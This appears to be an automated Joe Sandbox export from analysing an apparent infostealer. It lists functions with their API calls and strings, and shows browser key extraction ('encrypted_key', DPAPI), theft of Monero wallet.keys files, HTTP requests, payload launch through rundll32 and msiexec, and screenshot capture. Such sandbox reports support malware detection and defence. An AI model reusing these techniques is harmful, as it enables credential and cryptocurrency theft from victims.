Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95

Function 022B44E7 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 022B4505
memset.MSVCRT ref: 022B451C

Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072

lstrcat.KERNEL32(?,00000000), ref: 022B4553
lstrcat.KERNEL32(?,0064A30C), ref: 022B4572
lstrcat.KERNEL32(?,?), ref: 022B4586
lstrcat.KERNEL32(?,0064A5D8), ref: 022B459A

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022B8FF7: GetFileAttributesA.KERNEL32(00000000,?,022A1DBB,?,?,0042565C,?,?,00420E1F), ref: 022B9006

Part of subcall function 022A9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022A9FA0
Part of subcall function 022A9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022A9FF9

Part of subcall function 022A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022A9C53
Part of subcall function 022A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022A9C78
Part of subcall function 022A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022A9C98
Part of subcall function 022A9C27: ReadFile.KERNEL32(000000FF,?,00000000,022A16F6,00000000), ref: 022A9CC1
Part of subcall function 022A9C27: LocalFree.KERNEL32(022A16F6), ref: 022A9CF7
Part of subcall function 022A9C27: CloseHandle.KERNEL32(000000FF), ref: 022A9D01

Part of subcall function 022B9627: GlobalAlloc.KERNEL32(00000000,022B4644,022B4644), ref: 022B963A

StrStrA.SHLWAPI(?,(&x), ref: 022B465A
GlobalFree.KERNEL32(?), ref: 022B4779

Part of subcall function 022A9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022A5155,00000000,00000000), ref: 022A9D56
Part of subcall function 022A9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022A5155,00000000,?), ref: 022A9D68
Part of subcall function 022A9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022A5155,00000000,00000000), ref: 022A9D91
Part of subcall function 022A9D27: LocalFree.KERNEL32(?,?,?,?,022A5155,00000000,?), ref: 022A9DA6

Part of subcall function 022AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022AA094

lstrcat.KERNEL32(?,00000000), ref: 022B470A
StrCmpCA.SHLWAPI(?,004208D1), ref: 022B4727
lstrcat.KERNEL32(00000000,00000000), ref: 022B4739
lstrcat.KERNEL32(00000000,?), ref: 022B474C
lstrcat.KERNEL32(00000000,00420FB8), ref: 022B475B

Strings

(&x, xrefs: 022B464D, 022B4652

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID: (&x
API String ID: 1191620704-1411363936
Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
Instruction ID: 792862f3279b60d6c7864688e96c2e33ff5e2e6f48c71f85cebeb86ce6948637
Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
Instruction Fuzzy Hash: EC7162B6910218BBDB14FBE0DC99FEE737AAF49300F008598E60596184DB35D744CF91

Function 00414280 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041429E
memset.MSVCRT ref: 004142B5

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000), ref: 004142EC
lstrcatA.KERNEL32(?,00782718), ref: 0041430B
lstrcatA.KERNEL32(?,?), ref: 0041431F
lstrcatA.KERNEL32(?,00781528), ref: 00414333

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F

Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3

StrStrA.SHLWAPI(?,00782628), ref: 004143F3
GlobalFree.KERNEL32(?), ref: 00414512

Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

lstrcatA.KERNEL32(?,00000000), ref: 004144A3
StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
lstrcatA.KERNEL32(00000000,?), ref: 004144E5
lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4

Strings

(&x, xrefs: 004143E6

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID: (&x
API String ID: 1191620704-1411363936
Opcode ID: e9c503bfd55bf2daae8e75d1c13cfa2327b4c89ab9ea056daaa286f6558581c9
Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
Opcode Fuzzy Hash: e9c503bfd55bf2daae8e75d1c13cfa2327b4c89ab9ea056daaa286f6558581c9
Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95

Function 00418320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

RegOpenKeyExA.ADVAPI32(00000000,0077CC18,00000000,00020019,00000000,004205B6), ref: 004183A4
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
wsprintfA.USER32 ref: 00418459
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
RegCloseKey.ADVAPI32(00000000), ref: 0041848C
RegCloseKey.ADVAPI32(00000000), ref: 00418499

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

%s\%s, xrefs: 0041844D
- , xrefs: 004185A3
?, xrefs: 0041837A

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 42a5d8bc1a5f6b6aae150ce843a0b440668e7b255a0e5373a5ffc13d61f19133
Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
Opcode Fuzzy Hash: 42a5d8bc1a5f6b6aae150ce843a0b440668e7b255a0e5373a5ffc13d61f19133
Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5

Function 00410A60 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 205stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

memset.MSVCRT ref: 00410C1C
lstrcatA.KERNEL32(?,00000000), ref: 00410C35
lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
lstrcatA.KERNEL32(?,00000000), ref: 00410C88
lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
lstrlenA.KERNEL32(?), ref: 00410CA7
memset.MSVCRT ref: 00410CCD
memset.MSVCRT ref: 00410CE1

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66

Strings

.exe, xrefs: 00410A95

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
String ID: .exe
API String ID: 1395395982-4119554291
Opcode ID: 5e4bf211cd2d807b48d0bab5dfaabd8c7764bed20d7350be932a7f57dadaee1e
Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
Opcode Fuzzy Hash: 5e4bf211cd2d807b48d0bab5dfaabd8c7764bed20d7350be932a7f57dadaee1e
Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E

Function 022A4AE7 Relevance: 21.5, APIs: 11, Strings: 1, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
Part of subcall function 022A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
Part of subcall function 022A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022A4B7C
StrCmpCA.SHLWAPI(?,0064A480), ref: 022A4BA1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022A4D21
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022A504F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022A506B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022A507F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022A50B0
InternetCloseHandle.WININET(00000000), ref: 022A5114
InternetCloseHandle.WININET(00000000), ref: 022A512C
HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022A4D7C

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

InternetCloseHandle.WININET(00000000), ref: 022A5136

Strings

x(x, xrefs: 022A4E30, 022A4E35

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: x(x
API String ID: 2402878923-2787161950
Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
Instruction ID: a47b0c722214fdde7eeea8fbb16f4cc2098741581323c8e3db1ef5e17a6fdee0
Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
Instruction Fuzzy Hash: CE12D072920318ABCB16EBD4DD51FEEB37ABF25340F504199A10662598EF742F88CF61

Function 022B1612 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 022B1642

Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072

Part of subcall function 022B94C7: StrStrA.SHLWAPI(?,?), ref: 022B94D3

lstrcpy.KERNEL32(?,00000000), ref: 022B167E

Part of subcall function 022B94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022B94F7
Part of subcall function 022B94C7: lstrlen.KERNEL32(?), ref: 022B950E
Part of subcall function 022B94C7: wsprintfA.USER32 ref: 022B952E

lstrcpy.KERNEL32(?,00000000), ref: 022B16C6
lstrcpy.KERNEL32(?,00000000), ref: 022B170E
lstrcpy.KERNEL32(?,00000000), ref: 022B1755
lstrcpy.KERNEL32(?,00000000), ref: 022B179D
lstrcpy.KERNEL32(?,00000000), ref: 022B17E5
lstrcpy.KERNEL32(?,00000000), ref: 022B182C
lstrcpy.KERNEL32(?,00000000), ref: 022B1874

Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC

strtok_s.MSVCRT ref: 022B19B7

Strings

x'x, xrefs: 022B1856, 022B185C
0'x, xrefs: 022B17C7, 022B17CD

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
String ID: 0'x$x'x
API String ID: 4276352425-397258310
Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
Instruction ID: b269f49e9d4782999fe96444ad589319b87ca465c9d71c016730728f4533bfd0
Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
Instruction Fuzzy Hash: 4D71BAB1960218ABCB15EBF0DC88EEE737AAF55340F0449D8E10DA3154EE756B84CF61

Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C

Strings

image/jpeg, xrefs: 00419136

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: d3f300acffffec73a1ed4a36f821494afe58ad8f25ce0001d5394ca583b39d44
Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
Opcode Fuzzy Hash: d3f300acffffec73a1ed4a36f821494afe58ad8f25ce0001d5394ca583b39d44
Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65

Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
ShellExecuteEx.SHELL32(0000003C), ref: 004134EA

Strings

"" , xrefs: 0041309A
C:\Windows\system32\msiexec.exe, xrefs: 004134BF
.msi, xrefs: 00413398
/passive, xrefs: 0041345B
.dll, xrefs: 004131E5
<, xrefs: 00413490
/i ", xrefs: 004133E4
C:\Windows\system32\rundll32.exe, xrefs: 00413332

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 7b54bfdaa8c39128a7994bda412f36a02b80ac47492346df98f86680b69bf2b6
Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
Opcode Fuzzy Hash: 7b54bfdaa8c39128a7994bda412f36a02b80ac47492346df98f86680b69bf2b6
Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcatA.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcatA.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

\Monero\wallet.keys, xrefs: 0040138D
SOFTWARE\monero-project\monero-core, xrefs: 00401335
wallet_path, xrefs: 00401330
.keys, xrefs: 0040136B

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: 1ffaf8d4d6c2a3481fec365c2b0764f9c655753230e8ae66aea782baa7a8bf5d
Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
Opcode Fuzzy Hash: 1ffaf8d4d6c2a3481fec365c2b0764f9c655753230e8ae66aea782baa7a8bf5d
Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA

Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00750148), ref: 00406303
Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,007821A8,00000000,00000000,00400100,00000000), ref: 00406385
Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
lstrlenA.KERNEL32(00000000), ref: 0041532F

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
lstrlenA.KERNEL32(00000000), ref: 00415383
strtok.MSVCRT(00000000,?), ref: 0041539E
lstrlenA.KERNEL32(00000000), ref: 004153AE

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Strings

ERROR, xrefs: 00415432
ERROR, xrefs: 004153B9
ERROR, xrefs: 0041546F
ERROR, xrefs: 0041530A
ERROR, xrefs: 004154A9

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3532888709-1526165396
Opcode ID: 8853f5c5da968409b6cbaba164f86e7b859f398aed1122ab08fb9db45a23fc41
